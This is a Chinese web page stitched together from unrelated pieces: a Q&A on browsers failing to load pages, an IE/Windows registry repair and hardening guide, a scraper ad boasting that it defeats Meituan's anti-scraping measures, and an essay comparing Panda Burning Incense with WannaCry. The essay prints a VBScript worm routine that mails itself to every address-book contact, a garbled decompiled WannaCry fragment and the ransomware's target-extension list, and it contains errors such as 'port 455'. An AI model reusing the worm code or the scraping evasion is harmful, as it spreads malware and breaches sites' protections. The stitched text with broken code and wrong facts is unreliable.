便宜VPS网电脑可以上QQ,MSN,但不能打开一些常用网页,显示为找不到服务器!怎么解决???
能用QQ聊天,说明网络连通正常。不能浏览网页的原因,我认为可能是由于以下错误造成的:
1、浏览器“连接”选项设置错误
解决办法:
正确设置上网类型。如果是通过代理服务上网的,请正确填写代理服务器的IP地址与端口号;如果不是,请不要勾选“通过代理服务器”这个选项。
2、DNS服务器设置错误
解决办法:
如果ISP提供商分配给你的是固定的IP地址,那么请正确填写ISP提供的IP地址与DNS服务器地址;如果ISP提供商分配的是动态的IP地址,那么无须填写DNS服务器地址;还有一个可能是ISP提供商的DNS服务器出错(本人就遇到过),不能正确地进行域名→IP地址之间的转换,这个时候你可以在浏览器的地址栏敲入网站的IP地址,即可浏览网页。
3、防火墙设置错误
解决办法:
如果防火墙设置不当,那么可能阻隔与外网进行信息交换,造成无法浏览网页的故障。我们可以修改防火墙设置。
预防恶意网页代码的一些建议 解除常见恶意修改的一些方法
1、禁止修改注册表。方法为:
展开注册表到
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器Regedit.exe。
如果我们自己要修改注册表怎么办?请看下面的的“牢羊补牢篇”。
Windows 2000/xp/2003用户,还可以在把服务里面的远程注册表操作服务“Remote Registry Service”禁用,以免被恶意代码利用。
具体方法是:
开始--》设置--》控制面板--》管理工具--》服务
将Remote Registry Service项禁用即可。
4、及时打系统补丁,尤其是及时把IE升级到最新版本,可以在很大程度上避免IE漏洞带来的安全隐患。
打系统补丁的方法是:
开始--Windows Update...
或启动IE,用菜单:工具--》Windows update..
升级程序会自动检测你需要打哪些补丁
3、用GreenBrowser 或 Maxthon(MYIE2) 浏览网页。
它们拥有许多优秀的附加功能,尤其是禁止变更主页功能,能够让网友们冲浪时得到最大的便利。
GreenBrowser下载:
MYIE2[Maxthon(傲游)的前身]下载:
Maxthon(傲游)下载:
至于GreenBrowser 或 Maxthon(MYIE2) 哪个更合适你,可以参考:
王者之争--GreenBrowser VS Maxthon
4、下载安装微软最新的Microsoft Windows Script,可以很大程度上预防恶意修改。
5、相当多的恶意网页是含有有害代码的ActiveX网页文件,因此在IE设置中将ActiveX插件和控件、Java脚本等禁止,或者把WSH(Windows Scripting Host)删除就在很大程度上避免中标。
1)禁止脚本运行
打开资源管理器,点击“工具-文件夹选项-文件类型”,在文件类型中将后缀名为“BS、BE、JS、JSE、WSH、WSF”项全部删除,这样这些文件就不会被执行了(双击在前面您搜索到的*.js、*.bs文件试试)。
在IE窗口中点击菜单:工具→Internet选项,在弹出的对话框中选择“安全”标签,再点击〔自定义级别〕按钮,就会弹出“安全设置”对话框,把其中所有ActiveX插件和控件以及Java相关全部选择“禁用”即可。
2)删除WSH
Windows 98:
开始--》设置--》控制面板--》“添加/删除”程序
选择“Windows 设置/附件”,并单击“详细资料”,取消“Windows Scripting Host”选项,完成后单击〔确定〕按钮即可。
Windows 2000/XP:
双击“我的电脑”图标,然后执行“工具/文件夹选项”命令,选择“文件类型”选项卡,找到“BS BScript Script File”选项,并单击〔删除〕按钮,最后单击〔确定〕即可。
不过这样做以后的一个不便之处就是如果网页中使用了ActiveX插件、JavaScript(js) 或者 VBScript(vbs) 脚本,则该网页也将不能正常显示。有利就有弊,你还是自己看着办吧。
6、安装杀毒软件并打开网页监控、文件监控和内存监控。
可供我们选择的杀毒软件很多,国产的如瑞星、江民KV、金山毒霸等,国外的如赛门铁克NORTON、熊猫卫士、mcafee、趋势科技、卡巴斯基等,冠群金辰与美国CA合作的KILL等。
7、把fdisk.exe、deltree.exe、format.com等危险的命令文件改名,以免被恶意代码利用,造成不必要的损失。
8、不要轻易访问浏览一些自己不了解的站点,特别是那些看上去美丽诱人的网址,否则吃亏的往往是我们。
9、为WINDOWS系统文件夹里的HOSTS文件设置只读属性。
win 98: %SystemRoot%\\hosts
win 2000/xp: %SystemRoot%\\system32\\drivers\\etc\\hosts
HOSTS文件里保存有WINDOWS系统记录的IP地址与域名的对应关系。
有些网页恶意代码会修改这个文件迫使我们访问恶意网页/网站。
10、禁止访问已知的恶意网页/站点。方法是:打开IE,点击菜单“工具--》Internet选项--》内容--》分级审查”
点击[启用]按钮,会弹出“分级审查”对话框,然后点击“许可站点”标签,输入不想去的网站网址,按[从不]按钮,再点击[确定]。
关于IE分级审查功能的更多内容可参考下面这篇文章:
IE中的分级审查功能[图]
另外一种实现方法是修改HOSTS文件,操作方法可参考:
利用Hosts文件防止“QQ病毒”
大家可以先尝试以下工具,避免直接操作注册表可能引起的麻烦:
瑞星注册表修复工具
毒霸注册表修复工具
t***********************************************************************
打开注册表编辑器的方法:
开始-运行...
输入:
regedit
点“确定”按钮。
修改注册表后,一般按F5键刷新生效。如果不行,重新启动系统看看。
1、解开被禁用的注册表编辑工具
用记事本建立一个以REG为后缀名的文件,文件名可自定义,内容如下:
REGEDIT4
(注意这里要空一行)
[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System] \"DisableRegistryTools\"=dword:00000000要注意的是,在“REGEDIT4”一定要大写(如果你是Windows 2000或Windows XP用户,请将“REGEDIT4”写为“Windows Registry Editor Version 5.00)”,且后面要空一行,并且“REGEDIT4”中“T”和“4”之间一定不能有空格,否则……
双击打开该reg文件,当询问您“确实要把*.reg内的信息添加到注册表吗?”,选择“是”,即可将信息成功输入注册表中。
对于Windows 2000/XP/2003中,我们也以尝试组策略编辑器:
开始→运行,输入“Gpedit.msc”后回车,打开“组策略”。然后依次展开“用户配置→管理模板→系统”,双击右侧窗口中的“阻止访问注册表编辑工具”,在弹出的窗口中选择“已禁用”,“确定”后再退出“组策略”。
注册表解开了,下面就要对症下药,对注册表进行修改了。
2、IE主页/首页的问题
1)默认主页被修改
.表现形式:默认主页被改为某网站的网址
.修复办法:展开注册表到
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main
下,将右边窗口中的\"Default-Page-URL\"的键值修改为自己喜欢的网址。
2)IE主页不能修改
.表现形式:主页设置被屏蔽锁定,且设置选项无效不可更改
.修复办法:展开注册表到
HKEY_USERS\\.DEFAULT\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel
下,将右边窗口中的“homepage”的键值由原来的“1”修改为“0”即可,或干脆将“Control Panel”删除就可以了!
3)IE默认起始页被修改
.表现形式:默认起始页被改为某网站的网址
.修复办法:展开注册表到
HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main
将右边的“Start Page”键值修改为自己喜欢的网址。
3、修改IE的标题栏
.表现形式:在IE顶端蓝色标题栏上多出了宣传网站的等广告信息。
.修复办法:分别展开注册表到
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main
和
HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main
将在右边窗口中的“Window Title”主键值更改为“Microsoft Internet Explorer”或你喜欢的内容即可。
4、删除自运行程序
.表现形式:开机时自动打开浏览器显示非法网页。
.修复办法:
1)在
开始--》程序--》启动
中,直接删除;
2)展开注册表到
HKEY_CURRENT_USER\\ Software\\ Microsoft\\ Windows\\ CurrentVesion\\”及“\\HKEY_LOCALMA CHINE\\Software\\Microsoft\\ Windows\\CurrentVersion\\RUN
分支,在右边的窗口中,有许多Windows启动时便开始运行的程序,但是在菜单“开始/程序/启动”中却找不到。把自运行程序删除就可以了。
5、右键菜单
1)被添加非法网站链接和广告:
.表现形式:在鼠标右键弹出菜单里添加“网址之家”等诸如此类的链接信息。
.修复办法:展开注册表到
HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\MenuExt
分支,在IE中显示的附加右键菜单都列在右边的窗口中,常见的“网络蚂蚁”和“网际快车”点击右键下载的信息也存放在这里,只需找到显示广告的主键条目删除即可。
2)右键弹出菜单功能被禁用(失常):
.表现形式:在IE中点击右键,但不显示快捷菜单。
.修复办法:展开注册表到
HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions
分支,在右边的窗口中找到“NoBrowserContextMenu”键值名,将其键值设为“00000000”,按F5键刷新生效。
6、IE收藏夹被强行添加非法网站的地址链接
.表现形式:IE收藏夹内出现非法网站的链接信息。
.修复办法:请用手动直接清除,用鼠标右键移动至该非法网站信息上,点击右键弹出菜单,选择删除即可。
7、在IE工具栏非法添加按钮
.表现形式:工具栏处添加非法按钮。
.修复办法:IE工具栏图标信息在注册表
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Extensions
这个主键中,打开这个主键以后你会看到一些常用的软件,如Netants对应的ID值:“{57E91B47-F40A-11D1-B792-444553540000}”。双击这个ID值,你可以在右边看到一些字串值,如:“Button”、“CLSID”、“Default Visible”、“Exec”、“HotIcon”、“Icon”、“MenuText”、“MenuStatusBar”等等,字串值的含义如下:
CLSID为IE工具条的类标识码,恒为“{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}
ButtonText:自定义按钮上显示的文本。
Default Visible:控制自定义按钮是否可见,一般为“Yes”。
Exec:自定义按钮执行的目标,可以为执行程序或超文本链接。
HotIcon:鼠标移到按钮上时显示的图标。
Icon:定义一般情况下的图标。
MenuText:定义了鼠标指向浏览器工具菜单栏中的Netants时,在浏览器状态栏里面的内容。
MenuStatusBar:定义了当鼠标指向IE“工具”菜单中的相关选项里面的相关文字的时候,在状态栏所显示的相关说明。如在IE的“工具”菜单中鼠标放在Netants按键上,就会显示“Launch NetAnts”。
我们可以根据MenuText和MenuStatusBar找到非法添加的按钮对应的项目,把它删除。
.建议:在IE工具栏上按右键,从弹出的菜单中选择“锁定工具栏”,以防止恶意按钮的添加。
8、锁定地址栏的下拉菜单及其添加文字信息
.表现形式:将地址栏的下拉菜单变为灰色,而且在其上覆盖非法文字信息,或者在地址栏出现非法的网站/网页的网址
.修复办法:
HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Toolbar
分支,在右边窗口找到“LinksFolderName”键值名,将其键值设为“链接”,多余的字符一律去掉。
展开注册表到
HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\TypeURLs
分支,删除右边窗口中无用的键值
也可以到DOS下将Cookies目录下的index.dat文件删除看看。
9、IE菜单“查看”下的“源文件”项被禁用
.表现形式:将IE菜单“查看”下的“源文件”项不可用。
.修复办法:分别展开注册表到
HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions
和
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions
分支,在右边窗口找到\"NoViewSource\"键值名,将其键值设为“00000000”。
10.Internet 选项... 菜单/按钮失效
.表现形式:从IE菜单中选择“Internet 选项...”项,不显示“Internet 选项”对话框。
.修复办法:
展开注册表到
HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel
将右边窗口中的DWORD值\"Settings\"=dword:1、\"Links\"=dword:1、\"SecAddSites\"=dword:1全部改为\"0\"。
展开注册表到
HKEY_USERS.DEFAULT\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel
将右边窗口中的DWORD值\"homepage\"的键值改为\"0\"。
如果还不能解决,请看下面的18.
11、启动时的提示窗口
.表现形式:每次登录到Windows桌面前都出现一个提示窗口,显示那些网页的广告信息。
.修复办法:展开注册表到
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
分支,找到并删除右边窗口中的“LegalNotice-Caption”和“LegalNoticeText”键。其中“LegalNoticeCaption”是提示框的标题,“LegalNoticeText”是提示框的文本内容。
12、恢复“运行”选项
.表现形式:开始菜单中无“运行..\"项。
.修复办法:展开注册表到
HKEY_USERS/.DEFAULT/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
分支,在右边窗口中将“NoRun”的键值由“1”修改为“0”即可,或者将“NoRun”删除也可。
13、OE标题栏被添加非法信息破坏特性:
.表现形式:在顶端的Outlook Express蓝色标题栏添加非法信息。
.修复办法:展开注册表到
HKEY_LOCAL_USER\\Software\\Microsoft\\Outlook Express
分支,将右边窗口中的“WindowTitle”以及“Store Root”键的键值均设为空。按F5键刷新生效。
14、默认的IE搜索引擎被修改
.表现形式:IE的默认搜索引擎被篡改。
.修复办法:展开注册表到
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Search
分支,找到“SearchAssistant”键值名,修改为: {SUB_RFC1766}/srchasst/srchasst.htm ,然后再
找到“CustomizeSearch”键值名,将其键值修改为: {SUB_RFC1766}/srchasst/srchasst.htm
15、不能自定义安全级别
.表现形式:IE浏览器里面的安全自定义按钮被禁用。
.修复办法:展开注册表到
HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel
在右边窗口找到\"SecChangeSettings\"项,双击它,把值改为0
16输入正常网址,但显示出来的是非法网页
这里有两种情况:
1)
.表现形式:在IE地址栏输入正常的网址,但显示出来的是非法网页。
.修复办法:恢复HOSTS文件
具体操作可参考
中了网站恶意代码的一般修复方法
;artid=3851532
2)
.表现形式:输入正常的网址,如:,但实际打开的网址变成的? 等
.修复办法:
展开注册表到
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\URL\\DefaultPrefix
将右边窗口中的“默认”键的值改为:http://
展开注册表到
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\URL\\Prefixes\\
将右边窗口中的“www”键的值改为:http://
在
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\UrlTemplate下
在右边窗口中,我们可以看到有几个字符串,IE按照1,2,3,4....的顺序进行自动搜索,调整1,2,3,4...字符串的键值互相交换,即可调整自动搜索的顺序,亦可新建字符串,增加自动搜索的内容。
17.被恶意设置了或遗忘了分级审查口令
取消IE分级审查密码的两种方法
1.修改注册表法
点击“开始/运行”,在“运行”对话框中输入“regedit”打开注册表编辑器,定位到“HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Ratings”分支,这时就可以发现一个名为“KEY”的键值项,这就是已经过加密的分级审查密码,我们只需将它删除即可。重新启动电脑之后,你可以重新设置分级审查密码。打开IE浏览器,点击“工具/Internet选项”菜单,会打开“Internet 选项”对话框,点击“内容/分级审查”,你会发现分级审查口令已经被复位了,现在你只要输入新的分级审查口令即可。当然直接删除“Ratings”这个键,也可以取消分级审查的限制。
2.删除文件法
这里先假设你的操作系统安装在C:\\Windows文件夹下,然后进入C:\\Windows\\System文件夹,找到名为“ratings.pol”的文件,将它删除就可以了。要提醒大家注意的是ratings.pol文件是一个隐藏文件,如果你的系统设置为“不显示隐藏文件”,你是不会发现它的。因此在开始操作前,请先在资源管理器中点击“查看/文件夹选项”,在“文件夹选项”对话框中点击其中的“查看/显示所有文件”,再点击“确定”按钮退出即可。本方法在Windows 9X/Me下有效。
18.Internet选项的问题
1)Internet选项被禁用
.表现形式:是点击ie菜单:工具--》internet选项 后,会出现下图的提示
.修复办法:
展开注册表到
HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\restrictions
把右边窗口里的NoBrowserOptions键值设置为0,然后把所有浏览器关闭再打开看看。
2)internt选项菜单被隐藏
.表现形式:ie菜单工具列里没有internet选项
.修复办法:
展开注册表到
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer
把右边窗口里的NoFolderOptions设置为0,然后重新启动计算机
3)控制面板里的的internet选项也被禁用
.表现形式:
点击ie菜单:工具--》internet选项 后,会出现下图的提示
在控制面板里:
.修复办法:
展开注册表到
HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel
如右边窗口有如下键,请修改为0:
GeneralTab
SecurityTab
ContentTab
ConnectionsTab
ProgramsTab
AdvancedTab
如何对美团网商家数据进行采集或爬虫
用熊猫智能采集软件就可以了。软件内内置美团、大众点评等众多主流网站的采集模板,点击一下对应网站的图标,然后输入你需要的关键词和地区、栏目信息就可以新建一个采集了。目前最为方便简单的商家采集了。不用担心对方网站的防采集措施,熊猫里面都已经通过设置搞定了他们。
电脑病毒比拼,比特币和熊猫烧香有哪些相似与不同?
近年来的病毒,这里特指蠕虫病毒。
Stuxnet蠕虫,MS10-061,当蠕虫值入机器后,把自己设置成开机自启动,并释放驱动文件,把该驱动设置为服务自启动。该驱动负责突破系统TCP半开连接数限制,以方便蠕虫通过网络传播。感染系统的可移动驱动器(即U盘等),可通过U盘传播自身。通过MS10-061打印机服务远程代码执行漏洞在局域网传播自身。并尝试利用一些弱口令企图猜解并取得主机权限,危及整个网络的安全。为计算机设置了一个后门,不断尝试连接远程黑客服务器,收集用户信息,接收黑客指令,并可获取黑客远程服务器木马并执行,带来严重安全隐患。
熊猫烧香对我来说有点久远,虽然我有初始的蠕虫病毒,但没有解析关键的代码,只从网络中找到说是变了50次的变种一部分。
Set objOA=Wscript.CreateObject(\"Outlook.Application\")
创建一个OUTLOOK应用的对象
Set objMapi=objOA.GetNameSpace(\"MAPI\")
取得MAPI名字空间 For i=1 to objMapi.AddressLists.Count 遍历地址簿
Set objAddList=objMapi.AddressLists(i)For j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem (0)objMail.Recipients.Add (objAddList. AddressEntries (j)
取得收件人邮件地址
objMail.Subject=\" 你好!\"
设置邮件主题
objMail.Body=\"这次给你的附件,是我的新文档!\"
设置信件内容
objMail.Attachments.Add(“c:virus.vbs\")
把自己作为附件扩散出去
objMail.Send
发送邮件
Next
Next
Set objMapi=Nothing
Set objOA=Nothing
这块是源码的传播方式,其实是劫持了邮箱的账号密码,自动发送邮件给好友,其实附件带的就是病毒复制体了。与最近的比特币病毒相关的也只有在局域网中通过455端口迅速感染。
它的感染方式主要是通过下载,病毒会删除ghost文件,并对文档的图片进行更换,不会对文件造成损坏。
而比特币病毒不同。
WannaCry木马利用泄漏的方程式工具包中的“永恒之蓝”漏洞工具从MS17_010漏洞进行网络端口(455端口)扫描攻击,目标机器被成功攻陷后会从攻击机下载WannaCry木马进行感染,并作为攻击机再次扫描互联网和局域网其他机器,行成蠕虫感染大范围超快速扩散。
木马母体为mssecsvc.exe,运行后会扫描随机ip的互联网机器,尝试感染,也会扫描局域网相同网段的机器进行感染传播,此外会释放敲诈者程序tasksche.exe,对磁盘文件进行加密勒索。
V1=0;
Do
{
P_payload=payload_x86;
If(v1)
P_payload=payload_x64;
V3=*(void **)FileName[4*v1=260];
(v11+v1)=(int)v3;
memcpy(v3,p_payload,v1!=0?51364:16480);
*(v11+v1)+=v1!=0?513634:16480;
++v1
}
While(v12);
V4+CreateFileA(FileName,0*8000000u,1u,03u,4u,0);
这个就是利用MS17_010的数据了,这个锅只能背给不更新补丁的人了。
木马加密使用AES加密文件,并使用非对称加密算法RSA 2048加密随机密钥,每个文件使用一个随机密钥,下面就是密码学的概率了,就和当初二战时期德军的恩尼格玛密码机一样,每一天的密码算法是天文数字,除非得到密钥,其余不可能破解。
熊猫烧香是不会损害文件的,但这个是可以的。
.doc, .docx, .xls, .xlsx, .ppt, .pptx, .pst, .ost, .msg, .eml, .vsd, .vsdx, .txt, .csv, .rtf, .123, .wks, .wk1, .pdf, .dwg, .onetoc2, .snt, .jpeg, .jpg, .docb, .docm, .dot, .dotm, .dotx, .xlsm, .xlsb, .xlw, .xlt, .xlm, .xlc, .xltx, .xltm, .pptm, .pot, .pps, .ppsm, .ppsx, .ppam, .potx, .potm, .edb, .hwp, .602, .sxi, .sti, .sldx, .sldm, .sldm, .vdi, .vmdk, .vmx, .gpg, .aes, .ARC, .PAQ, .bz2, .tbk, .bak, .tar, .tgz, .gz, .7z, .rar, .zip, .backup, .iso, .vcd, .bmp, .png, .gif, .raw, .cgm, .tif, .tiff, .nef, .psd, .ai, .svg, .djvu, .m4u, .m3u, .mid, .wma, .flv, .3g2, .mkv, .3gp, .mp4, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .mp3, .sh, .class, .jar, .java, .rb, .asp, .php, .jsp, .brd, .sch, .dch, .dip, .pl, .vb, .vbs, .ps1, .bat, .cmd, .js, .asm, .h, .pas, .cpp, .c, .cs, .suo, .sln, .ldf, .mdf, .ibd, .myi, .myd, .frm, .odb, .dbf, .db, .mdb, .accdb, .sql, .sqlitedb, .sqlite3, .asc, .lay6, .lay, .mml, .sxm, .otg, .odg, .uop, .std, .sxd, .otp, .odp, .wb2, .slk, .dif, .stc, .sxc, .ots, .ods, .3dm, .max, .3ds, .uot, .stw, .sxw, .ott, .odt, .pem, .p12, .csr, .crt, .key, .pfx, .der
这些都是病毒会攻击的文档后缀。
和熊猫不同的是,它会通过tor匿名,监听9050端口,通过本地代理通信实现与服务器连接。
